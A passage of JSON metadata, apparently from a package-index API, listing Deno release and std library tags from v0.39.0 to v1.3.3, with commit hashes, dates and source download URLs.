/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/